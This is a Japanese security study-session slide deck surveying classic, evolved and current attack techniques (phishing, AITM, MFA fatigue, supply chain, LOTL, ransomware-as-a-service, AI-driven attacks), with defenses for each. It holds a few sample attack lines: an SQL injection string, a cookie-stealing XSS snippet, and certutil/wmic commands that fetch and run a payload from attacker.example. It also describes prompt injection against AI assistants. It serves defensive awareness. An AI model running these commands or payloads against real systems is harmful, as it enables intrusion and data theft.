---
title: 明日話せるセキュリティネタ会#3
tags:  #システムエンジニア #セキュリティ  
author: [Quatrex](https://docswell.com/user/Quatrex)
site: [Docswell](https://www.docswell.com/)
thumbnail: https://bcdn.docswell.com/page/PEXQX324JX.jpg?width=480
description: 攻撃手法の古典から最新まで、サラッと説明しました。 2026/4/16開催。
published: April 19, 26
canonical: https://docswell.com/s/Quatrex/ZGNLGQ-2026-04-19
---
# Page. 1

![Page Image](https://bcdn.docswell.com/page/PEXQX324JX.jpg)


# Page. 2

![Page Image](https://bcdn.docswell.com/page/3EK9WYMPED.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
今日のテーマ
攻撃の全体像を俯瞰して、守りの勘所を掴む
古典
進化
トレンド
今も現役で動いている
基礎技法
SQLi・スプレー攻撃
ソーシャルエンジニアリング
古典の延長線上で
巧妙化した手法
AITM・MFA疲労
AI生成フィッシング
ここ数年で主流化した
新しい脅威
RaaS・LOTL
サプライチェーン
CLASSIC
EVOLVED
TREND
守りを考える前に、何が飛んできているかを知る回です。
2


# Page. 3

![Page Image](https://bcdn.docswell.com/page/L73W19Y475.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
攻撃手法の全体像
カテゴリ
人を騙す
認証を破る
システムを壊す
信頼を悪用
AIを使う
代表的な手法
ソーシャルエンジニアリング / フィッシング / ビッシング
パスワード攻撃 / AITM / MFA疲労
マルウェア / ランサムウェア / ワイパー
サプライチェーン攻撃 / LOTL
ディープフェイク / Prompt Injection
攻撃は進化する
ツールはコモディティ化し、
技能のハードルが下がり続けている
主な狙い
認証情報・内部情報
アカウント奪取
破壊・身代金
本丸への侵入経路
なりすまし・情報窃取
古典は残る
新手法は古典を置き換えない。
上乗せされていく
3


# Page. 4

![Page Image](https://bcdn.docswell.com/page/87DKXG55JG.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
古典的攻撃
PART 1
STILL WORKING TODAY
4


# Page. 5

![Page Image](https://bcdn.docswell.com/page/VJPKP3GDE8.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
【古典①】ソーシャルエンジニアリング
技術ではなく &quot;人&quot; を攻撃する
プリテキスティング
役職者や取引先を装って
情報を引き出す
例: &quot;総務部の〇〇ですが
新入社員のID確認で…&quot;
ベイティング
興味を引く物を&quot;餌&quot;にする
例: USBメモリを駐車場に落と
す
/ 社外秘と書いたファイル
テールゲーティング
物理的な侵入
例: 正規社員の後ろに
くっついて入館
1990年代に Kevin Mitnick が体系化。
30年経っても一番成功率が高い攻撃であり続けている。
技術対策では防げない → 人の訓練が必要。
5


# Page. 6

![Page Image](https://bcdn.docswell.com/page/2EVV246GEQ.jpg)

【古典②】パスワード攻撃
明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
手法
辞書攻撃
ブルートフォース
パスワードスプレー
クレデンシャルスタッフィング
リバースブルートフォース
2026-04-19 | Quatrex × かーでぃ
概要
よく使われる単語リストで総当たり
全文字列を機械的に試す
1パスワード × 多数アカウント
漏洩済みID/PWの使い回し狙い
既知IDに対して総当たり
近年の潮流
パスワードスプレーは
アカウントロックを回避できるため、
2024-2025年の企業侵害で
多数観測
対策
複雑なパスワード
アカウントロック
ロック回避型・今も有効
使い回し禁止・MFA
レート制限・MFA
守り方
MFA必須化(特権アカウント)
パスキー移行
不審ログイン検知
ID/PW使い回し禁止教育
6


# Page. 7

![Page Image](https://bcdn.docswell.com/page/57GLR12DEL.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
【古典③】Webアプリ攻撃
2026-04-19 | Quatrex × かーでぃ
1990年代から続く定番、今なお OWASP Top 10 の常連
SQLi
DBクエリに細工した値を
注入して実行させる
&#039; OR &#039;1&#039;=&#039;1&#039; --
2025年も新規CVE量産中
XSS
スクリプトを埋め込んで
閲覧者のセッション奪取
&lt;script&gt;
fetch(&#039;evil&#039;, {...cookie})
&lt;/script&gt;
反射型・格納型・DOM型
CSRF
ログイン済みユーザーに
勝手に操作させる
標的が攻撃者のリンクを
踏むだけで送金等が実行
SameSite Cookie 等で緩和
古典中の古典だが、&quot;昔の話&quot; ではなく &quot;今もある話&quot;。
2025年もフレームワークの誤設定・独自実装でやられ続けている。
7


# Page. 8

![Page Image](https://bcdn.docswell.com/page/4EQYVDPXJP.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
【古典④】マルウェアの系譜
感染の目的で分類が進化してきた
1980s〜
ウイルス
ファイル感染 破
壊・愉快犯
動機の変化
愉快犯 → ビジネス
攻撃は産業化し、
儲かる方向に収束した
2000s〜
ワーム
自己増殖 ネット蔓
延
2000s〜
トロイ
偽装・潜伏 バック
ドア
2005〜
スパイ/バンカー
情報窃取 金銭目的
へ
2010s〜
ランサム
暗号化+脅迫 ビジネ
ス化
二重恐喝・三重恐喝
暗号化 + 情報公開 +
DDoS + 取引先への通報
払うまで止めない構造
8


# Page. 9

![Page Image](https://bcdn.docswell.com/page/KJ4WMZY271.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
進化する攻撃
PART 2
FROM CLASSIC TO MODERN
9


# Page. 10

![Page Image](https://bcdn.docswell.com/page/LE1Y8R6K7G.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
【進化】フィッシング ― メールから AI 生成へ
〜2015
メール
日本語の違和感で 見抜け
た時代
2015〜
スミッシング
SMS / 宅配不在 銀行名義
2025年の現実
証券口座乗っ取り事件の
起点は AI 生成フィッシング
不正売買額 7,393億円
見た目での判定は限界。
フィッシング耐性のある認証 (パスキー) と、
&quot;リンクを踏まない運用&quot; にシフトが必要。
2020〜
ビッシング
音声 / ヘルプデスク なり
すまし
2023〜
AI生成
自然な日本語 パーソナラ
イズ
通用しなくなったもの
&quot;日本語が変だから怪しい&quot;
&quot;ドメインを確認しよう&quot;
(正規ドメインを中継される)
&quot;ベンダーロゴで判断&quot;
10


# Page. 11

![Page Image](https://bcdn.docswell.com/page/GEWGZ1WPJ2.jpg)

【進化】中間者攻撃 ― MITM から AITM へ
明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
MITM CLASSIC
Man-in-the-Middle
AITM MODERN
Adversary-in-the-Middle
典型: 公衆WiFiでの傍受
典型: EvilGinx, Modlishka
通信経路に割り込み
盗聴・改ざん
TLS普及で一時的に下火に
ユーザー
攻撃者サーバが正規サイトへリアルタイム中継
ID/PW・MFA コード・セッションクッキーを奪取
MFAを突破できる
▶
攻撃者サーバ
リバースプロキシが入力を素通し
▶ 正規サイト
⤴ 途中で セッションCookie を掠め取る
2025年の証券口座事件で実際に使われた手法。
対策は FIDO / パスキー ― フィッシング耐性のある認証方式。
11


# Page. 12

![Page Image](https://bcdn.docswell.com/page/47ZL1P56J3.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
【進化】認証突破 ― MFA も万能じゃない
MFA疲労攻撃
SIMスワップ
復旧フロー悪用
深夜に大量プッシュ通知を送
り、
根負けして承認させる
Uber侵害 (2022) の手口
通信キャリアを騙して
SIM を乗っ取り、
SMS OTP を奪う
パスワード再設定・
バックアップコード・
ヘルプデスクなど
横道から侵入
FATIGUE
TELCO
67%
×150
フィッシング型MFAが突破された攻撃
AITM攻撃の増加
割合
(Microsoft, 2024)
(2022→2024)
&quot;MFA 入れたから安心&quot; は卒業すべき。次は パスキー。
RECOVERY
100%
パスキーのフィッシング耐性
(FIDO設計上)
12


# Page. 13

![Page Image](https://bcdn.docswell.com/page/YJ6WLM9LJV.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
最新トレンド
PART 3
THE CURRENT FRONTLINE
13


# Page. 14

![Page Image](https://bcdn.docswell.com/page/GJ5M1ZNMJ4.jpg)

【トレンド】サプライチェーン攻撃
明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
標的を直接攻めず、取引先や依存ライブラリから入る
事例
SolarWinds
MOVEit
XZ Utils backdoor
アスクル
守る側の教訓
年
2020
2023
2024
2025
侵入経路
監視ソフト更新に毒混入
ファイル転送SaaSの脆弱性
OSSメンテナ乗っ取り
MFA未設定の業務委託先
委託先・SaaS の認証統制
SBOM による依存把握
権限は最小化+期限付き
影響
米政府機関含む1.8万社
2,700社超
Linux全体に波及寸前
法人売上95%減
経産省の動き
SCS 評価制度
(★3〜★5 の 3 段階)
2026年度末から開始予定
自社だけでは守り切れない時代
14


# Page. 15

![Page Image](https://bcdn.docswell.com/page/LE3W1929E5.jpg)

【トレンド】Living off the Land (LOTL)
明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
攻撃者は &quot;専用マルウェア&quot; を持ち込まない
正規ツールを悪用
powershell.exe
, WMI
certutil , bitsadmin
psexec , schtasks
mshta , rundll32
wmic
なぜ厄介か
シグネチャ型 AV に検知されにくい
ログ上は正常な管理操作と区別困難
検知には文脈・振る舞いの理解が必要
→ ファイルレスで動く
# 正規コマンドで任意ファイルをダウンロード&amp;実行
certutil -urlcache -f http://attacker.example/payload.exe payload.exe
# WMI 経由でリモート実行(横展開)
wmic /node:target.local process call create &quot;cmd.exe /c payload.exe&quot;
対策は EDR + 振る舞い検知。シグネチャ型AVでは無理。
15


# Page. 16

![Page Image](https://bcdn.docswell.com/page/8EDKXGZ87G.jpg)

【トレンド】RaaS ― ランサムウェアの産業化
明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
開発者
IAB
アフィリエイト
マルウェア本体を
開発・保守
アフィリエイトへ提供
Initial Access Broker
侵入済み環境を
ダークウェブで販売
実際に展開し
身代金を分配
70-80% を取る
DEVELOPER
グループ
Qilin (キリン)
LockBit
ALPHV / BlackCat
Akira
特徴
BROKER
ロシア系、医療/製造業標的
2024 国際捜査摘発 → 再興
医療・金融
中堅企業狙い
AFFILIATE
代表事例
アサヒGHD (2025)
名古屋港 (2023)
Change Healthcare (2024)
国内事例多数
攻撃が分業化・効率化された結果、件数も質も上がり続けている。
16


# Page. 17

![Page Image](https://bcdn.docswell.com/page/V7PKP3DWJ8.jpg)

【最新】AI 駆動型攻撃
明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
2024-2025年から実運用段階に入った新しい脅威
ディープフェイク
Prompt Injection
自律型攻撃
香港で CFO になりすました
動画会議で 38 億円詐取
(2024年2月)
Arup社の事例
社内 RAG・AI アシスタント
に仕込んだ文書から
機密データを吐かせる
OWASP LLM Top 10 の #1
LLM が偵察〜侵入〜横展開を
自動実行する実験段階
PentestGPT 等で実証
×4
生成AI活用フィッシング
38億円
Arup社の
TOP
1
OWASP LLM Top 10 の
DEEPFAKE
メールの増加 (2023→2024)
LLM
ディープフェイク被害額
攻撃側のコストが下がる = 攻撃の数と精度が両方上がる。
AGENT
Prompt Injection
17


# Page. 18

![Page Image](https://bcdn.docswell.com/page/2JVV2419JQ.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
【最前線】AI が見つけた 27年モノのバグ
Claude Mythos Preview (Anthropic) が OpenBSD TCP SACK に潜む脆弱性を自律発見
バグの正体
影響
意味するもの
符号付き整数オーバーフロー ×
2 の論理連鎖
不正パケット1つで
カーネルクラッシュ
27年間未検出で
OpenBSD に潜伏
従来のファジングでは
到達しにくい論理バグを
AI が設計意図を読んで
組み合わせて発見
防御にも使える
&quot;両刃の剣&quot;
SIGNED OVERFLOW
レンジ始点の未チェック
シーケンス番号比較で
(int)(a - b) &lt; 0 が
約21億離れると反転
DoS
守る側も AI を使う時代。攻守ともに AI 駆動が標準化しつつある。
参考: AIが27年モノのOpenBSDバグを発見 — 窓の杜
AI
18


# Page. 19

![Page Image](https://bcdn.docswell.com/page/5EGLR124JL.jpg)

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る
2026-04-19 | Quatrex × かーでぃ
まとめ ― 明日話せる3つのポイント
01
古典は死んでいない
SQLi も パスワードスプレー も
ソーシャルエンジニアリングも
今日の主役
新手法は古典を置き換えず、
上に積み上がっていく
#明日話せるセキュリティネタ会
02
&quot;MFA 入れたから安心&quot;
は終わった
AITM と MFA疲労で突破される
次は FIDO / パスキー
(フィッシング耐性認証)
03
自社だけ守っても
守り切れない
サプライチェーン・委託先・
OSS 依存がすべて攻撃面
最小権限 + 監視 + 評価制度
― Quatrex × かーでぃ
19